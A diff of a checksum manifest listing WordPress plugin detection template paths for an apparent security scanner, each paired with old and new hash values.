+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:cea95f563c150a5fd757a75512a573b6c8675512 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:f7e4f1b9231d25d8bdcfea19c7b6a09b97e367b3 +http/technologies/wordpress/plugins/coblocks.yaml:e4bd2210721e1fda60d1ac0086349ed3d4411c99 +http/technologies/wordpress/plugins/code-snippets.yaml:4d0aa2eaadc011a2e9e1fc7400415c057f16ce31 +http/technologies/wordpress/plugins/coming-soon.yaml:d576ac737cbc6857b25b1299f5781b4030b5c5a2 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:1cf1c9fdb0b096eff63693161f1220547c5eb860 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:7a3b65c0790e60323c0a5992e5aaa5c2a646c805 +http/technologies/wordpress/plugins/contact-form-7.yaml:eab24ec6c20bd9dda981116d26896d4e64a96e4e +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:e32b11178eb658bb87e78ea32e5a12a0ccddf883 +http/technologies/wordpress/plugins/cookie-law-info.yaml:0c34332f33b456272766b058c3d412701f2a3ecd +http/technologies/wordpress/plugins/cookie-notice.yaml:0dfff2063b1979f59f599d5c614f43e80f589af1 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:4852eaa8a92e0ae86bd2c541503f9dddf32346b1 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:28f36fb5059a5b62190cf9327b7b0db309cd8b8b +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:be3c36a9139845a4c14f08a2a66d8b861c082d1b +http/technologies/wordpress/plugins/custom-css-js.yaml:fbb677dd313412bf501f0f300eb6b9968ccf22c9 +http/technologies/wordpress/plugins/custom-fonts.yaml:35a4df3e7e451d171326f5ff59a021ef475fa3c9 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b26943c0591f2a08a9ef4597625ba6b15161f3fe +http/technologies/wordpress/plugins/disable-comments.yaml:86418d7fd77615ed015d70709635d88cfeb05eee +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6c5c91d2f04cd4d03cd03cc1059ef4ab3d984e80 +http/technologies/wordpress/plugins/duplicate-page.yaml:8d0d9ac3ec5248c39f31cdf50a6a8619f726fd5f +http/technologies/wordpress/plugins/duplicate-post.yaml:44adf9ed1434bb8540672d72808aaeb92e401f7a +http/technologies/wordpress/plugins/duplicator.yaml:c2858bf75dec80f1327697a09f47f68034ae6a9d +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:83442b67a45f903fc92b6449a14aca0930a77ef2 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:9ec26d3937d3e20d4f4bf5491c6eb75623103816 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b92716a7f0ab86db12106fb3a0ee87a33f7ce6de +http/technologies/wordpress/plugins/elementor.yaml:25afbcd14bb8cbc097483c7b618317f079d8921b +http/technologies/wordpress/plugins/elementskit-lite.yaml:a71ed5028ddc6af8eef7af85945412b99892f1bd +http/technologies/wordpress/plugins/enable-media-replace.yaml:1329f0ed3017302a90f06396a090ce93daf89715 +http/technologies/wordpress/plugins/envato-elements.yaml:c1c8b21b6802e1337d65417dd81e87584532a7b8 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:7f8c91b16e12ddc67de7a022c3b8f301f0901f2b +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:258e6db594f6aab2264bb520be74600751ad66b2 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:7626fe56d2d2c82215e7a8e2b9dd4666f3dc72e7 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f1c82930e8f48ecc71ac1da144e388b261055d19 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:373ee5e13ff7a25ff8bb0f5e5f1fa13bab74641b +http/technologies/wordpress/plugins/flamingo.yaml:0813b57e8ff4d96dac6cfe451550d16d17f80e11 +http/technologies/wordpress/plugins/fluentform.yaml:e407611c5b760b78473887e802f625004dcbe2d2 +http/technologies/wordpress/plugins/font-awesome.yaml:d2a2fdeb4624e0c409d9024706d1ab7b5f50285c +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:97ee157a891665e2b082f6eef70466114dd99c73 +http/technologies/wordpress/plugins/formidable.yaml:c829024a8eb286f043196cf06eba176a8e264bf7 +http/technologies/wordpress/plugins/forminator.yaml:5ac9eba2f051d595318fda702105d403a0685306 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:e2510c1c6bda3b64ac16d6f11cea6daa126e9bae +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:cd626422326a4742e3848d431cb3baba65aacc8c +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:57038fad7141bc4413c7474710870d8ccc57c930 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:978ceda54ab190a7603cee18ad6ec264af359fd2 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:71fd3110bb083c73577b7f176ea6eea50f36dc99 +http/technologies/wordpress/plugins/google-site-kit.yaml:2257ca703bf090ad5a3893632371ca1c261fe932 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:ce1636f135ccc2e37136aad670f7d002f839745f +http/technologies/wordpress/plugins/gtranslate.yaml:28ab4ee6860b3388aa5d38ba8d7b52f4be92064e +http/technologies/wordpress/plugins/gutenberg.yaml:fa0b61c0091ccd3ee518e76d804a5e2ca92a56a0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:63235e3dbeb7a6d1e3665ab985328d3b3e32d636 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:2ad710f2058364e95e543ddf54bd3114ef85e96c +http/technologies/wordpress/plugins/header-footer-elementor.yaml:29c87cfe02b5022d7ce2d823339976594aa860de +http/technologies/wordpress/plugins/header-footer.yaml:37f2d599d19c07115e4f126510e6d93934832032 +http/technologies/wordpress/plugins/health-check.yaml:233971ec58e6ca0271b3da28a9177bb7e03c9ff6 +http/technologies/wordpress/plugins/hello-dolly.yaml:f964309e2301bf39690b09fc3a3c802d4e09176f +http/technologies/wordpress/plugins/host-webfonts-local.yaml:bfde29820a4369e30858b7c4b859acaddaec8a16 +http/technologies/wordpress/plugins/hostinger.yaml:6d947bdb5b4b57868e6c4c30e1a6ec5d8019b2bd +http/technologies/wordpress/plugins/image-optimization.yaml:3b46dc70690a82c84d874ff77fa72f280a10b4af +http/technologies/wordpress/plugins/imagify.yaml:e9291fc6b43fc9c3b921ca7ed3413fb8d0b8beae +http/technologies/wordpress/plugins/imsanity.yaml:5b0b660a0fb0fe0714b9b426fe7a3ad061b60a6d +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:1f482f6cd73a641f777dee092fc5ea27d2e74485 +http/technologies/wordpress/plugins/instagram-feed.yaml:3a57b667455a5a65cf1a0f4e85323799787ac5ed +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:7446b2b8e5ab92d068cd67f8e1de0b01be51ae55 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:5bb71e48d5c3f45efd4d7ae84abbd1787f5257d1 +http/technologies/wordpress/plugins/jetpack.yaml:c057a3404373398e3057537f8fdc8c04332be4bb +http/technologies/wordpress/plugins/kadence-blocks.yaml:d36b58a83cfcee47d1e656afa928fa5338666942 +http/technologies/wordpress/plugins/kirki.yaml:aacaadecbdf48b39bde4fffbd819fa9fed0c6f7f +http/technologies/wordpress/plugins/leadin.yaml:0f9e3aaa5be6d2974245ba5d099112da4c8eb3aa +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:4971f7f35c5a84dd06b78242d6dde346e57b23cc +http/technologies/wordpress/plugins/limit-login-attempts.yaml:39aeab01ac5fd9ec98a892ed8982bf6148e8975e +http/technologies/wordpress/plugins/litespeed-cache.yaml:3fab61b34d22fb8b94bf58c73d537d4c38d7acd9 +http/technologies/wordpress/plugins/loco-translate.yaml:526246ccc489126a99fe38ba794b084ae4b5affc +http/technologies/wordpress/plugins/loginizer.yaml:7fb1d2edb7ab5aa8d97e670c00f9e08e9147331b http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:e3699bcbf44c37650887f0ec42025e01673c21f0 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:15069208400bfb23a60b4c3ffee9818b1e3b43e6 +http/technologies/wordpress/plugins/mailpoet.yaml:657c0f32bea2fbc636f4bd8cfc448a084dfd4119 +http/technologies/wordpress/plugins/maintenance.yaml:3c34597c2a905a020e9261b8c4d9c0446536f236 +http/technologies/wordpress/plugins/mainwp-child.yaml:8307680b071306493f5b55e9cc0bd4dcedbf950c +http/technologies/wordpress/plugins/malcare-security.yaml:0ad0c5c99479d2b9de0223c4951797e6bb86ea5d +http/technologies/wordpress/plugins/megamenu.yaml:7c5a98f6eaa4f9d0c5838ed75b3bb678bdee303a +http/technologies/wordpress/plugins/members.yaml:6fb212c4300025160f0356c8ffe147ca67e9cfab +http/technologies/wordpress/plugins/meta-box.yaml:49e37ec88229bb33f601437295a5161c637bdbd9 +http/technologies/wordpress/plugins/metform.yaml:5396dc363939b8e4d40088d7f7fee61cd7b7c3a2 +http/technologies/wordpress/plugins/ml-slider.yaml:cf4ad2a10d1ccb6613c7fa7858920f1881310f2b +http/technologies/wordpress/plugins/newsletter.yaml:def73a7d65cd88947299598ae741e5c4bbe711b8 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:775ad13b6101c09056840b2e7baac58469fd88fb +http/technologies/wordpress/plugins/nextgen-gallery.yaml:2283bb25e788f0a90601082e429fe5cdac28a173 +http/technologies/wordpress/plugins/ninja-forms.yaml:bfe6ee635ae12c8329966ece64ad9bcc6e708ce4 +http/technologies/wordpress/plugins/ocean-extra.yaml:24a3fce6570b90bfdd34238f0c89d73a3fa044d4 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:595eedd5b2032c9a9d0fa00b4a1aa2897c360a7e +http/technologies/wordpress/plugins/one-click-demo-import.yaml:31cd4657399d5d6a010d53f918da58e5d3070d95 +http/technologies/wordpress/plugins/optinmonster.yaml:97b95c28f301e2df08d74761b2fbb7335d105d96 +http/technologies/wordpress/plugins/otter-blocks.yaml:3eebd6b7f306e4e3f14f5498573a454977564ec8 +http/technologies/wordpress/plugins/password-protected.yaml:206aebab065a7e553f9039a0f2982a61289751c3 +http/technologies/wordpress/plugins/pdf-embedder.yaml:6f53f0a3d5d39fa094f4256d945881263b3d2928 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:b548cca1adc151cf91f4999df3c1a85a64f663f7 +http/technologies/wordpress/plugins/pixelyoursite.yaml:603a515735ea3638fcda26c283c9c976e7c8e584 +http/technologies/wordpress/plugins/polylang.yaml:d1d15de289f918042a6935617164d2e041497a09 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:8863e727d41d7ebfa96177233723d71ed52c8f94 +http/technologies/wordpress/plugins/post-smtp.yaml:0d1f05fdf40f66ccc478654bedb5eff7d9d6a701 +http/technologies/wordpress/plugins/post-types-order.yaml:538b511a445d6febe9ae8c730007073863af0cef +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:d5fefdbd0138b5ed6b4c349c67747163c31a7ec0 +http/technologies/wordpress/plugins/pretty-link.yaml:14231c8d7579b32eea8f3c209ffcd3126a052e11 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:c6a041519e2e78a456384ba6a011c578f40f9356 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:42ac14dda267d0f44061427b5ac30fade5aa7e6d +http/technologies/wordpress/plugins/redirection.yaml:62249e7fbe5b980a8ca9086de99b08d6f54cc3e4 +http/technologies/wordpress/plugins/redux-framework.yaml:1e21e1c27f0f5a50ed0dcfb1bbe4bab213b11a72 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:3889397bbd2f005cbc423fc7533e5b06a1fe98c3 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:0aa09230419259e0dceed1197ce55c5e60670b84 +http/technologies/wordpress/plugins/safe-svg.yaml:b98be73766cb618471f3aee4c085efd8562f3541 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d5fa22ba94f292c4ba740d1a333918a7212d35bf +http/technologies/wordpress/plugins/sg-cachepress.yaml:0b158e3aa223a80acadac8cae9bf3965f13be7cb +http/technologies/wordpress/plugins/sg-security.yaml:956ea87a319f05657ed87d59c0ab4ec3e5e32b94 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:dfb9d0d4d3fe39924aef36b555ec9a18e75646c9 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:7992f73a05643e0a6ba645969942badd822e8378 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:9fa05ad6526c1ec78eb1b85c5bd0799b5a04fbf2 +http/technologies/wordpress/plugins/simple-history.yaml:5d75de0b17618f8cea3797e1f1e5cf94354b4623 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:5042fad13404ffc8c70d63974d663bdb2958b6a5 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:7dcff2bc03c4425e7c5e87fbb218f1cc1ac8ae0a +http/technologies/wordpress/plugins/smart-slider-3.yaml:3a91eb3e5a01c0a150e0590c630fc717b837806d +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:26dbcf480b06136ed8124dbab9e7c6d2fb5049f5 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:ac555d61433f134bed93206e6e52ebdaba16b97f +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:7f695de002fcc4309824b35ef76972930f88ba7f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:803103b2c672921557c1b44eaabe6823d622c15d +http/technologies/wordpress/plugins/svg-support.yaml:9f788846c01152831f8beac6662f28045498efe6 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:2de018b459538943f2a2bbefa63fcb0889fb0ae3 +http/technologies/wordpress/plugins/tablepress.yaml:60d196ad787af4a6b9104624e5fec9e9998808c8 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:625385d0ec37d666b1fe403dcf859a1919b81995 +http/technologies/wordpress/plugins/templately.yaml:de191978de638d6d93213c162d2f861c1f7f602c +http/technologies/wordpress/plugins/the-events-calendar.yaml:ee6712feffc640bca75a8780f578bf38a2f7f5c4 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 